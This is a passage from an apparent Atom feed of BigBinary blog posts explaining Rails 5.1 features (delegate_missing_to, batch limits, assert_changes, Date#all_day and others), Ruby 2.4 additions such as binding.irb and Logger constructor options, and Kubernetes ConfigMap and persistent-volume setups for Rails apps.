end</code></pre><p>The behavior of <code>rubocop</code> can be controlled by the <code>.rubocop.yml</code> file. If you want to get started with the rubocop file that Rails uses, then just execute the following command at the root of your Rails application.</p><pre><code class="language-bash">wget https://raw.githubusercontent.com/rails/rails/master/.rubocop.yml</code></pre><p>Open the downloaded file and change the <code>TargetRubyVersion</code> value to match the ruby version the project is using.</p><p>Execute rubocop on all ruby files.</p><pre><code class="language-bash">bundle install
bundle exec rubocop -a &quot;{app}/**/*.rb&quot;</code></pre><h2>Code is changed on git commit and not on git add</h2><p>We noticed that some people were a bit confused when <code>git add</code> did not format the code.</p><p>Code is formatted when <code>git commit</code> is done.</p><h2>npm install is important</h2><p>It's important to note that users need to do <code>npm install</code> for all this to work. Otherwise <code>prettier</code> or <code>rubocop</code> won't be activated and they will silently fail.</p><h2>Full package.json file</h2><p>After all the changes are done, <code>package.json</code> should look as shown below.</p><pre><code class="language-ruby">{
  &quot;scripts&quot;: {
    &quot;precommit&quot;: &quot;lint-staged&quot;
  },
  &quot;lint-staged&quot;: {
    &quot;app/**/*.{js,es6,jsx,scss,css}&quot;: [
      &quot;./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write&quot;,
      &quot;git add&quot;
    ],
    &quot;{app,test}/**/*.rb&quot;: [
      &quot;bundle exec rubocop -a&quot;,
      &quot;git add&quot;
    ]
  },
  &quot;devDependencies&quot;: {
    &quot;husky&quot;: &quot;^0.13.4&quot;,
    &quot;lint-staged&quot;: &quot;^3.6.0&quot;,
    &quot;prettier&quot;: &quot;^1.4.2&quot;
  }
}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 adds delegate_missing_to]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-adds-delegate-missing-to"/>
      <updated>2017-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-adds-delegate-missing-to</id>
      <content type="html"><![CDATA[<p>When we use <code>method_missing</code> we should also use <a href="http://blog.marc-andre.ca/2010/11/15/methodmissing-politely/">respond_to_missing?</a>. Because of this, code becomes verbose, since both <code>method_missing</code> and <code>respond_to_missing?</code> need to move in tandem.</p><p>DHH, in <a href="https://github.com/rails/rails/issues/23824">the issue</a> itself, provided a good example of this verbosity.</p><pre><code class="language-ruby">class Partition
  def initialize(first_event)
    @events = [ first_event ]
  end

  def people
    if @events.first.detail.people.any?
      @events.collect { |e| Array(e.detail.people) }.flatten.uniq
    else
      @events.collect(&amp;:creator).uniq
    end
  end

  private

    def respond_to_missing?(name, include_private = false)
      @events.respond_to?(name, include_private)
    end

    def method_missing(method, *args, &amp;block)
      @events.public_send(method, *args, &amp;block)
    end
end</code></pre><p>He proposed a new method, <code>delegate_missing_to</code>. Here is how it can be used.</p><pre><code class="language-ruby">class Partition
  delegate_missing_to :@events

  def initialize(first_event)
    @events = [ first_event ]
  end

  def people
    if @events.first.detail.people.any?
      @events.collect { |e| Array(e.detail.people) }.flatten.uniq
    else
      @events.collect(&amp;:creator).uniq
    end
  end
end</code></pre><h2>Why not SimpleDelegator</h2><p>We at BigBinary have used <a href="https://ruby-doc.org/stdlib-2.2.1/libdoc/delegate/rdoc/SimpleDelegator.html">SimpleDelegator</a>. However, one issue with it is that statically we do not know what object the calls are getting delegated to, since at run time the target could be anything.</p><p>DHH had the following to <a href="https://github.com/rails/rails/issues/23824#issuecomment-221171899">say</a> about this pattern.</p><blockquote><p>I prefer not having to hijack the inheritance tree for such a simple feature.</p></blockquote><h2>Why not the delegate method</h2><p>The <a href="https://apidock.com/rails/Module/delegate">delegate</a> method works. However, here we need to whitelist all the methods, and in some cases the list can get really long. Following is an example from a real project.</p><pre><code class="language-ruby">delegate :browser_status, :browser_stats_present?,
         :browser_failed_count, :browser_passed_count,
         :sequential_id, :project, :initiation_info,
         :test_run, :success?,
         to: :test_run_browser_stats</code></pre><h2>Delegate everything</h2><p>Sometimes we just want to delegate all missing methods. In such cases the <code>delegate_missing_to</code> method does the job neatly. Note that delegation happens only to the <code>public</code> methods of the object being delegated to.</p><p>Check out the <a href="https://github.com/rails/rails/pull/23930">pull request</a> for more details on this.</p>]]></content>
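To see the mechanism outside of Rails, here is a plain-Ruby sketch of roughly what `delegate_missing_to :@events` generates (the real macro ships with Rails 5.1 and is more involved); missing calls are forwarded to the target object's public methods. The `EventList` class is invented for this example.

```ruby
# Hand-rolled delegation, sketching delegate_missing_to's behavior.
class EventList
  def initialize(events)
    @events = events
  end

  private

  def respond_to_missing?(name, include_private = false)
    @events.respond_to?(name) || super
  end

  def method_missing(method, *args, &block)
    if @events.respond_to?(method)
      # Only public methods of the target are reachable, as with the macro.
      @events.public_send(method, *args, &block)
    else
      super
    end
  end
end

list = EventList.new([:created, :updated])
list.size   # => 2, delegated to the underlying Array
```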
    </entry><entry>
       <title><![CDATA[Kubernetes Configmap with files to deploy Rails apps]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-configmap-with-configuration-files-for-deploying-rails-app"/>
      <updated>2017-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-configmap-with-configuration-files-for-deploying-rails-app</id>
      <content type="html"><![CDATA[<p>This post assumes that you have a basic understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a> and <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><p>We deploy our Rails applications on Kubernetes and frequently do rolling deployments.</p><p>While performing application deployments on a Kubernetes cluster, sometimes we need to change the application configuration file. Changing this configuration file means we need to change the source code, commit the change and then go through the complete deployment process.</p><p>This gets cumbersome for simple changes.</p><p>Let's take the case of wanting to add a queue to the sidekiq configuration.</p><p>We should be able to change the configuration and restart the pod instead of modifying the source code, creating a new image and then performing a new deployment.</p><p>This is where Kubernetes's <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">ConfigMap</a> comes in handy. It allows us to handle configuration files much more efficiently.</p><p>Now we will walk you through the process of managing the sidekiq configuration file using a configmap.</p><h2>Starting with configmap</h2><p>First we need to create a configmap. We can either create it using the <code>kubectl create configmap</code> command or we can use a yaml template.</p><p>We will be using the yaml template <code>test-configmap.yml</code> which already has the sidekiq configuration.</p><pre><code class="language-yaml">apiVersion: v1
kind: ConfigMap
metadata:
  name: test-staging-sidekiq
  labels:
    name: test-staging-sidekiq
  namespace: test
data:
  config: |-
    ---
    :verbose: true
    :environment: staging
    :pidfile: tmp/pids/sidekiq.pid
    :logfile: log/sidekiq.log
    :concurrency: 20
    :queues:
      - [default, 1]
    :dynamic: true
    :timeout: 300</code></pre><p>The above template creates the configmap in the <code>test</code> namespace, and it is only accessible in that namespace.</p><p>Let's launch this configmap using the following command.</p><pre><code class="language-bash">$ kubectl create -f test-configmap.yml
configmap &quot;test-staging-sidekiq&quot; created</code></pre><p>After that, let's use this configmap to create our <code>sidekiq.yml</code> configuration file in the deployment template named <code>test-deployment.yml</code>.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-staging
  labels:
    app: test-staging
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-staging
        imagePullPolicy: Always
        env:
        - name: REDIS_HOST
          value: test-staging-redis
        - name: APP_ENV
          value: staging
        - name: CLIENT
          value: test
        volumeMounts:
        - mountPath: /etc/sidekiq/config
          name: test-staging-sidekiq
        ports:
        - containerPort: 80
      volumes:
      - name: test-staging-sidekiq
        configMap:
          name: test-staging-sidekiq
          items:
          - key: config
            path: sidekiq.yml
      imagePullSecrets:
      - name: registrykey</code></pre><p>Now let's create a deployment using the above template.</p><pre><code class="language-bash">$ kubectl create -f test-deployment.yml
deployment &quot;test-staging&quot; created</code></pre><p>Once the deployment is created, the pod running from that deployment will start sidekiq using the <code>sidekiq.yml</code> mounted at <code>/etc/sidekiq/config/sidekiq.yml</code>.</p><p>Let's check this on the pod.</p><pre><code class="language-bash">deployer@test-staging-2766611832-jst35:~$ cat /etc/sidekiq/config/sidekiq.yml
---
:verbose: true
:environment: staging
:pidfile: tmp/pids/sidekiq.pid
:logfile: log/sidekiq.log
:concurrency: 20
:timeout: 300
:dynamic: true
:queues:
  - [default, 1]</code></pre><p>Our sidekiq process uses this configuration to start sidekiq. Looks like the configmap did its job.</p><p>Further, if we want to add a new queue to sidekiq, we can simply modify the configmap template and restart the pod.</p><p>For example, if we want to add a <code>mailer</code> queue we will modify the template as shown below.</p><pre><code class="language-yaml">apiVersion: v1
kind: ConfigMap
metadata:
  name: test-staging-sidekiq
  labels:
    name: test-staging-sidekiq
  namespace: test
data:
  config: |-
    ---
    :verbose: true
    :environment: staging
    :pidfile: tmp/pids/sidekiq.pid
    :logfile: log/sidekiq.log
    :concurrency: 20
    :queues:
      - [default, 1]
      - [mailer, 1]
    :dynamic: true
    :timeout: 300</code></pre><p>Let's apply this configmap using the following command.</p><pre><code class="language-bash">$ kubectl apply -f test-configmap.yml
configmap &quot;test-staging-sidekiq&quot; configured</code></pre><p>Once the pod is restarted, it will use the new sidekiq configuration fetched from the configmap.</p><p>In this way, we keep our Rails application configuration files out of the source code and tweak them as needed.</p>]]></content>
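From the application's point of view, the mounted ConfigMap is just a file on disk. As a self-contained sketch of what the container sees, the snippet below stands in a temp directory for `/etc/sidekiq/config` and reads the config back with `YAML.load_file`. String keys are used here so the example works across Psych versions; Sidekiq's real file uses symbol keys as shown in the post.

```ruby
require 'yaml'
require 'tmpdir'

# Simulate the mounted /etc/sidekiq/config/sidekiq.yml with a temp file.
config_dir  = Dir.mktmpdir
config_path = File.join(config_dir, 'sidekiq.yml')
File.write(config_path, <<~YAML)
  ---
  verbose: true
  environment: staging
  concurrency: 20
  queues:
    - [default, 1]
YAML

# The app (or sidekiq) simply parses the mounted file at boot.
config = YAML.load_file(config_path)
# config['concurrency'] == 20
# config['queues']      == [["default", 1]]
```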
    </entry><entry>
       <title><![CDATA[Rails 5.1 adds support for limit in batch processing]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-adds-support-for-limit-in-batch-processing"/>
      <updated>2017-05-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-adds-support-for-limit-in-batch-processing</id>
      <content type="html"><![CDATA[<p>Before Rails 5.1, we were not able to limit the number of records fetched in batch processing.</p><p>Let's take an example. Assume our system has 20 users.</p><pre><code class="language-ruby">User.find_each { |user| puts user.id }</code></pre><p>The above code will print the ids of all 20 users.</p><p>There was no way to limit the number of records. Active Record's <code>limit</code> method didn't work for batches.</p><pre><code class="language-ruby">User.limit(10).find_each { |user| puts user.id }</code></pre><p>The above code still prints the ids of all 20 users, even though the intention was to limit the records fetched to 10.</p><p>Rails 5.1 <a href="https://github.com/rails/rails/commit/451437c6f57e66cc7586ec966e530493927098c7">has added support</a> for limiting the records in batch processing.</p><pre><code class="language-ruby">User.limit(10).find_each { |user| puts user.id }</code></pre><p>The above code will print only 10 ids in Rails 5.1.</p><p>We can make use of limit in <code>find_in_batches</code> and <code>in_batches</code> as well.</p><pre><code class="language-ruby">total_count = 0
User.limit(10).find_in_batches(batch_size: 4) do |batch|
  total_count += batch.count
end

total_count
#=&gt; 10</code></pre>]]></content>
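The interaction between `limit` and `batch_size` can be illustrated without a database. The helper below is a plain-Ruby sketch of the Rails 5.1 semantics, not Active Record's actual implementation: the limit caps the total number of records handed out, while `batch_size` controls each slice.

```ruby
# Plain-Ruby sketch of limit-aware batching.
def batched(records, batch_size:, limit: nil)
  limited = limit ? records.take(limit) : records
  limited.each_slice(batch_size) { |batch| yield batch }
end

sizes = []
batched((1..20).to_a, batch_size: 4, limit: 10) { |b| sizes << b.size }
# sizes == [4, 4, 2], i.e. 10 records in total, with a short final batch
```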
    </entry><entry>
       <title><![CDATA[Rails 5.1 doesn't share thread_mattr_accessor variable]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-does-not-share-thread-mattr-accessor-variable-with-sub-class"/>
      <updated>2017-05-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-does-not-share-thread-mattr-accessor-variable-with-sub-class</id>
      <content type="html"><![CDATA[<p>Rails 5.0 provides <a href="rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis">thread_mattr_accessor</a> to define class-level variables on a per-thread basis.</p><p>However, the variable was getting shared with child classes as well. That meant that when a child class changed the value of the variable, the effect was seen in the parent class too.</p><pre><code class="language-ruby">class Player
  thread_mattr_accessor :alias
end

class PowerPlayer &lt; Player
end

Player.alias = 'Gunner'
PowerPlayer.alias = 'Bomber'

&gt; PowerPlayer.alias
#=&gt; &quot;Bomber&quot;

&gt; Player.alias
#=&gt; &quot;Bomber&quot;</code></pre><p>This isn't the intended behavior as per OOP principles.</p><p>In Rails 5.1 <a href="https://github.com/rails/rails/pull/25681">this problem was resolved</a>. Now a change in the value of a <code>thread_mattr_accessor</code> variable in a child class will not affect the value in its parent class.</p><pre><code class="language-ruby">class Player
  thread_mattr_accessor :alias
end

class PowerPlayer &lt; Player
end

Player.alias = 'Gunner'
PowerPlayer.alias = 'Bomber'

&gt; PowerPlayer.alias
#=&gt; &quot;Bomber&quot;

&gt; Player.alias
#=&gt; &quot;Gunner&quot;</code></pre>]]></content>
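The fix can be sketched without Rails: if the per-thread storage is keyed by the receiving class's own name, a write in a subclass no longer leaks to the parent. This is only an illustrative approximation of the idea behind the Rails 5.1 change; the class and attribute names are invented, and Rails' actual implementation is more involved.

```ruby
# Per-thread, per-class storage keyed by the receiver's class name.
class Base
  def self.nickname=(value)
    Thread.current["attr_#{name}_nickname"] = value
  end

  def self.nickname
    Thread.current["attr_#{name}_nickname"]
  end
end

class Child < Base; end

Base.nickname  = 'Gunner'
Child.nickname = 'Bomber'
# Base.nickname  == "Gunner"   (no longer clobbered by the subclass)
# Child.nickname == "Bomber"
```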
    </entry><entry>
       <title><![CDATA[Rails 5.1 introduced assert_changes and assert_no_changes]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-introduced-assert_changes-and-assert_no_changes"/>
      <updated>2017-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-introduced-assert_changes-and-assert_no_changes</id>
      <content type="html"><![CDATA[<p>Rails 5.1 has introduced <a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_changes">assert_changes</a> and <a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_changes">assert_no_changes</a>. They can be seen as more generic versions of <a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_difference">assert_difference</a> and <a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_difference">assert_no_difference</a>.</p><h3>assert_changes</h3><p><code>assert_changes</code> asserts that the value of an expression changes before and after invoking the block. The specified expression can be a string, like in <code>assert_difference</code>.</p><pre><code class="language-ruby">@user = users(:john)

assert_changes 'users(:john).status' do
  post :update, params: { id: @user.id, user: { status: 'online' } }
end</code></pre><p>We can also pass a lambda as the expression.</p><pre><code class="language-ruby">@user = users(:john)

assert_changes -&gt; { users(:john).status } do
  post :update, params: { id: @user.id, user: { status: 'online' } }
end</code></pre><p><code>assert_changes</code> also allows the options <code>:from</code> and <code>:to</code> to specify the initial and final state of the expression.</p><pre><code class="language-ruby">@light = Light.new

assert_changes -&gt; { @light.status }, from: 'off', to: 'on' do
  @light.turn_on
end</code></pre><p>We can also specify a test failure message.</p><pre><code class="language-ruby">@invoice = invoices(:bb_client)

assert_changes -&gt; { @invoice.status }, 'Expected the invoice to be marked paid', to: 'paid' do
  @invoice.make_payment
end</code></pre><h3>assert_no_changes</h3><p><code>assert_no_changes</code> takes the same options and asserts that the expression doesn't change before and after invoking the block.</p>]]></content>
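Under the hood, the idea is simple: evaluate the expression before and after the block and fail when nothing changed (or when `:from`/`:to` don't match). The toy version below is a sketch of that logic for illustration, not the actual Rails implementation.

```ruby
# Toy re-creation of assert_changes' core behavior.
def assert_changes_sketch(expression, from: nil, to: nil)
  before = expression.call
  raise "expected initial value #{from.inspect}, got #{before.inspect}" if from && before != from
  yield
  after = expression.call
  raise "expression did not change" if before == after
  raise "expected final value #{to.inspect}, got #{after.inspect}" if to && after != to
  after
end

status = 'off'
result = assert_changes_sketch(-> { status }, from: 'off', to: 'on') { status = 'on' }
# result == "on"; a block that leaves the expression untouched would raise
```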
    </entry><entry>
       <title><![CDATA[Forward ActiveRecord::Relation#count to Enumerable#count]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/forwarding-active-record-relation-count-to-enumerable-count"/>
      <updated>2017-05-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/forwarding-active-record-relation-count-to-enumerable-count</id>
      <content type="html"><![CDATA[<p>Let's say that we want to know all the deliveries in progress for an order.</p><p>The following code would do the job.</p><pre><code class="language-ruby">class Order
  has_many :deliveries

  def num_deliveries_in_progress
    deliveries.select { |delivery| delivery.in_progress? }.size
  end
end</code></pre><p>But using <code>count</code> should make more sense than a <code>select</code>, right?</p><pre><code class="language-ruby">class Order
  has_many :deliveries

  def num_deliveries_in_progress
    deliveries.count { |delivery| delivery.in_progress? }
  end
end</code></pre><p>However, the changed code would return the count of all the order's deliveries, rather than only the ones in progress.</p><p>That's because <code>ActiveRecord::Relation#count</code> silently discarded the block argument.</p><p>Rails 5.1 <a href="https://github.com/rails/rails/pull/24203/files#diff-e0e70620d0897d6819a6bcc2b5ee7a73">fixed this issue</a>.</p><pre><code class="language-ruby">module ActiveRecord
  module Calculations
    def count(column_name = nil)
      if block_given?
        to_a.count { |*block_args| yield(*block_args) }
      else
        calculate(:count, column_name)
      end
    end
  end
end</code></pre><p>So now, we can pass a block to the <code>count</code> method.</p>]]></content>
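The fix forwards the block to `Enumerable#count`, which counts only the elements the block matches. That behavior is easy to see with plain objects; `Delivery` below is an invented `Struct` standing in for the Active Record model.

```ruby
# Enumerable#count with a block counts only the matching elements.
Delivery = Struct.new(:state) do
  def in_progress?
    state == :in_progress
  end
end

deliveries = [Delivery.new(:in_progress),
              Delivery.new(:delivered),
              Delivery.new(:in_progress)]

in_progress = deliveries.count { |d| d.in_progress? }
# in_progress == 2, whereas deliveries.count == 3 without a block
```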
    </entry><entry>
       <title><![CDATA[Rails 5.1 has introduced Date#all_day helper]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-has-introduced-date-all_day-helper"/>
      <updated>2017-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-has-introduced-date-all_day-helper</id>
      <content type="html"><![CDATA[<p>Sometimes, we want to query records over the whole day for a given date.</p><pre><code class="language-ruby">&gt;&gt; User.where(created_at: Date.today.beginning_of_day..Date.today.end_of_day)
=&gt; SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;created_at&quot; BETWEEN $1 AND $2) [[&quot;created_at&quot;, 2017-04-09 00:00:00 UTC], [&quot;created_at&quot;, 2017-04-09 23:59:59 UTC]]</code></pre><p>Rails 5.1 has <a href="https://github.com/rails/rails/pull/24930">introduced a helper method</a>, <code>Date#all_day</code>, for creating this range object for a given date.</p><pre><code class="language-ruby">&gt;&gt; User.where(created_at: Date.today.all_day)
=&gt; SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;created_at&quot; BETWEEN $1 AND $2) [[&quot;created_at&quot;, 2017-04-09 00:00:00 UTC], [&quot;created_at&quot;, 2017-04-09 23:59:59 UTC]]</code></pre><p>We can confirm that the <code>Date#all_day</code> method returns the range object for a given date.</p><pre><code class="language-ruby">&gt;&gt; Date.today.all_day
=&gt; Sun, 09 Apr 2017 00:00:00 UTC +00:00..Sun, 09 Apr 2017 23:59:59 UTC +00:00</code></pre>]]></content>
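For intuition, the range `Date#all_day` builds can be approximated in plain Ruby without Active Support. This is only an approximation (Active Support's `end_of_day` carries fractional seconds, and the time zone follows the app's configuration; UTC is assumed here for simplicity).

```ruby
require 'date'

# Approximate beginning_of_day..end_of_day for a date, in UTC.
date  = Date.new(2017, 4, 9)
start = Time.utc(date.year, date.month, date.day)
range = start..(start + 86_399) # up to 23:59:59 on the same day

range.cover?(Time.utc(2017, 4, 9, 12, 30)) # => true
range.cover?(Time.utc(2017, 4, 10, 0, 0))  # => false
```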
    </entry><entry>
       <title><![CDATA[Binding irb - Runtime Invocation for IRB]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/binding-irb"/>
      <updated>2017-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/binding-irb</id>
      <content type="html"><![CDATA[<p>It's very common to see a Ruby programmer write a few <code>puts</code> or <code>p</code> statements, either for debugging or for knowing the value of variables.</p><p><a href="https://github.com/pry/pry">pry</a> did make our lives easier with <code>binding.pry</code>. However, it is an external gem that needs to be installed, which is a bit of an inconvenience when all we have at hand is <code>irb</code>.</p><p>Ruby 2.4 has now introduced <code>binding.irb</code>. By simply adding <code>binding.irb</code> to our code we can open an IRB session.</p><pre><code class="language-ruby">class ConvolutedProcess
  def do_something
    @variable = 10
    binding.irb    # opens a REPL here
  end
end

irb(main):029:0* ConvolutedProcess.new.do_something
irb(#&lt;ConvolutedProcess:0x007fc55c827f48&gt;):001:0&gt; @variable
=&gt; 10</code></pre>]]></content>
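`binding.irb` works because `Kernel#binding` captures the local scope at the call site and hands it to the REPL. A non-interactive sketch of that same mechanism (the method and variable names are illustrative):

```ruby
def do_something
  secret = 41
  b = binding # captures locals and self here, which is what binding.irb hands to IRB
  # Instead of opening a REPL, inspect the captured scope programmatically:
  b.local_variable_get(:secret) + 1
end

do_something #=> 42
```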
    </entry><entry>
       <title><![CDATA[Kubernetes Persistent volume to store persistent data]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-persistent-volume-for-persistent-data-storage"/>
      <updated>2017-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-persistent-volume-for-persistent-data-storage</id>
      <content type="html"><![CDATA[<p>In one of our projects, we are running a Rails application on a <a href="http://kubernetes.io/">Kubernetes</a> cluster. Kubernetes is a proven tool for managing and deploying Docker containers in production.</p><p>In Kubernetes, containers are managed using <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>, and the running units are termed <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>. A <code>deployment</code> holds the specification of its pods and is responsible for running them with the specified resources. When a <code>pod</code> is restarted or its <code>deployment</code> is deleted, the data on the pod is lost. We need to retain data beyond the pod's lifecycle, even when the <code>pod</code> or <code>deployment</code> is destroyed.</p><p>We use docker-compose during development. In docker-compose, linking a host directory to a container directory works out of the box. We wanted a similar mechanism for linking volumes in Kubernetes. Kubernetes offers various types of <a href="https://kubernetes.io/docs/user-guide/volumes/#types-of-volumes1">volumes</a>. We chose a <a href="http://kubernetes.io/docs/user-guide/persistent-volumes/">persistent volume</a> backed by <a href="https://aws.amazon.com/ebs/">AWS EBS</a> storage, and used persistent volume claims as per the needs of the application.</p><p>As per the <a href="http://kubernetes.io/docs/user-guide/persistent-volumes/">Persistent Volume's definition</a> (PV), cluster administrators must first create storage in order for Kubernetes to mount it.</p><p>Our Kubernetes cluster is hosted on AWS. We created AWS EBS volumes which can be used to create persistent volumes.</p><p>Let's create a sample volume using the AWS CLI and use it in a deployment.</p><pre><code class="language-bash">aws ec2 create-volume --availability-zone us-east-1a --size 20 --volume-type gp2</code></pre><p>This will create a volume in the <code>us-east-1a</code> availability zone. We need to note the <code>VolumeId</code> once the volume is created.</p><pre><code class="language-bash">$ aws ec2 create-volume --availability-zone us-east-1a --size 20 --volume-type gp2
{
    &quot;AvailabilityZone&quot;: &quot;us-east-1a&quot;,
    &quot;Encrypted&quot;: false,
    &quot;VolumeType&quot;: &quot;gp2&quot;,
    &quot;VolumeId&quot;: &quot;vol-123456we7890ilk12&quot;,
    &quot;State&quot;: &quot;creating&quot;,
    &quot;Iops&quot;: 100,
    &quot;SnapshotId&quot;: &quot;&quot;,
    &quot;CreateTime&quot;: &quot;2017-01-04T03:53:00.298Z&quot;,
    &quot;Size&quot;: 20
}</code></pre><p>Now let's create a persistent volume template <code>test-pv</code> to create a volume using this EBS storage.</p><pre><code class="language-yaml">kind: PersistentVolume
apiVersion: v1
metadata:
  name: test-pv
  labels:
    type: amazonEBS
spec:
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteMany
  awsElasticBlockStore:
    volumeID: &lt;your-volume-id&gt;
    fsType: ext4</code></pre><p>Once we had the template to create the persistent volume, we used <a href="http://kubernetes.io/docs/user-guide/kubectl/">kubectl</a> to launch it. Kubectl is the command line tool for interacting with a Kubernetes cluster.</p><pre><code class="language-bash">$ kubectl create -f test-pv.yml
persistentvolume &quot;test-pv&quot; created</code></pre><p>Once the persistent volume is created, we can check it using the following command.</p><pre><code class="language-bash">$ kubectl get pv
NAME       CAPACITY   ACCESSMODES   RECLAIMPOLICY   STATUS      CLAIM               REASON    AGE
test-pv     10Gi        RWX           Retain          Available                                7s</code></pre><p>Now that our persistent volume is in the available state, we can claim it by creating a <a href="http://kubernetes.io/docs/user-guide/persistent-volumes/#persistentvolumeclaims">persistent volume claim</a>.</p><p>We can define the persistent volume claim using the following template, <code>test-pvc.yml</code>.</p><pre><code class="language-yaml">kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: test-pvc
  labels:
    type: amazonEBS
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 10Gi</code></pre><p>Let's create the persistent volume claim using the above template.</p><pre><code class="language-bash">$ kubectl create -f test-pvc.yml
persistentvolumeclaim &quot;test-pvc&quot; created</code></pre><p>After creating the persistent volume claim, our persistent volume will change from the <code>available</code> state to the <code>bound</code> state.</p><pre><code class="language-bash">$ kubectl get pv
NAME       CAPACITY   ACCESSMODES   RECLAIMPOLICY   STATUS     CLAIM               REASON    AGE
test-pv    10Gi        RWX           Retain          Bound      default/test-pvc              2m

$ kubectl get pvc
NAME        STATUS    VOLUME    CAPACITY   ACCESSMODES   AGE
test-pvc    Bound     test-pv   10Gi        RWX           1m</code></pre><p>Now that we have a persistent volume claim available on our Kubernetes cluster, let's use it in a deployment.</p><h3>Deploying Kubernetes application</h3><p>We will use the following deployment template as <code>test-pv-deployment.yml</code>.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-pv
  labels:
    app: test-pv
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: test-pv
        tier: frontend
    spec:
      containers:
        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
          name: test-pv
          imagePullPolicy: Always
          env:
            - name: APP_ENV
              value: staging
            - name: UNICORN_WORKER_PROCESSES
              value: &quot;2&quot;
          volumeMounts:
            - name: test-volume
              mountPath: &quot;/&lt;path-to-my-app&gt;/shared/data&quot;
          ports:
            - containerPort: 80
      imagePullSecrets:
        - name: registrypullsecret
      volumes:
        - name: test-volume
          persistentVolumeClaim:
            claimName: test-pvc</code></pre><p>Now launch the deployment using the following command.</p><pre><code class="language-bash">$ kubectl create -f test-pv-deployment.yml
deployment &quot;test-pv&quot; created</code></pre><p>Once the deployment is up and running, all the contents of the <code>shared</code> directory will be stored on the persistent volume claim. Even when a pod or deployment crashes for any reason, our data will be retained on the persistent volume, and a newly launched deployment can use it.</p><p>This met our goal of retaining data across deployments and <code>pod</code> restarts.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has added additional parameters for Logger#new]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-added-additional-parameters-for-logger-new"/>
      <updated>2017-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-added-additional-parameters-for-logger-new</id>
       <content type="html"><![CDATA[<p>The <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/logger/rdoc/Logger.html#method-c-new">Logger</a> class in Ruby provides a simple but sophisticated logging utility.</p><p>After creating the logger object, we need to set its level.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">require 'logger'

logger = Logger.new(STDOUT)
logger.level = Logger::INFO</code></pre><p>If we are working with <code>ActiveRecord::Base.logger</code>, then the same code would look something like this.</p><pre><code class="language-ruby">require 'logger'

ActiveRecord::Base.logger = Logger.new(STDOUT)
ActiveRecord::Base.logger.level = Logger::INFO</code></pre><p>As we can see, in both cases we need to set the level separately after instantiating the object.</p><h3>Ruby 2.4</h3><p>In Ruby 2.4, <code>level</code> can now be specified in the constructor.</p><pre><code class="language-ruby"># ruby 2.4
require 'logger'

logger = Logger.new(STDOUT, level: Logger::INFO)

# let's verify it
logger.level      #=&gt; 1</code></pre><p>Similarly, other options such as <code>progname</code>, <code>formatter</code> and <code>datetime_format</code>, which prior to Ruby 2.4 had to be set explicitly, can now be set during instantiation.</p><pre><code class="language-ruby"># ruby 2.3
require 'logger'

logger = Logger.new(STDOUT)
logger.level = Logger::INFO
logger.progname = 'bigbinary'
logger.datetime_format = '%Y-%m-%d %H:%M:%S'
logger.formatter = proc do |severity, datetime, progname, msg|
  &quot;#{severity} #{datetime} ==&gt; App: #{progname}, Message: #{msg}\n&quot;
end

logger.info(&quot;Program started...&quot;)
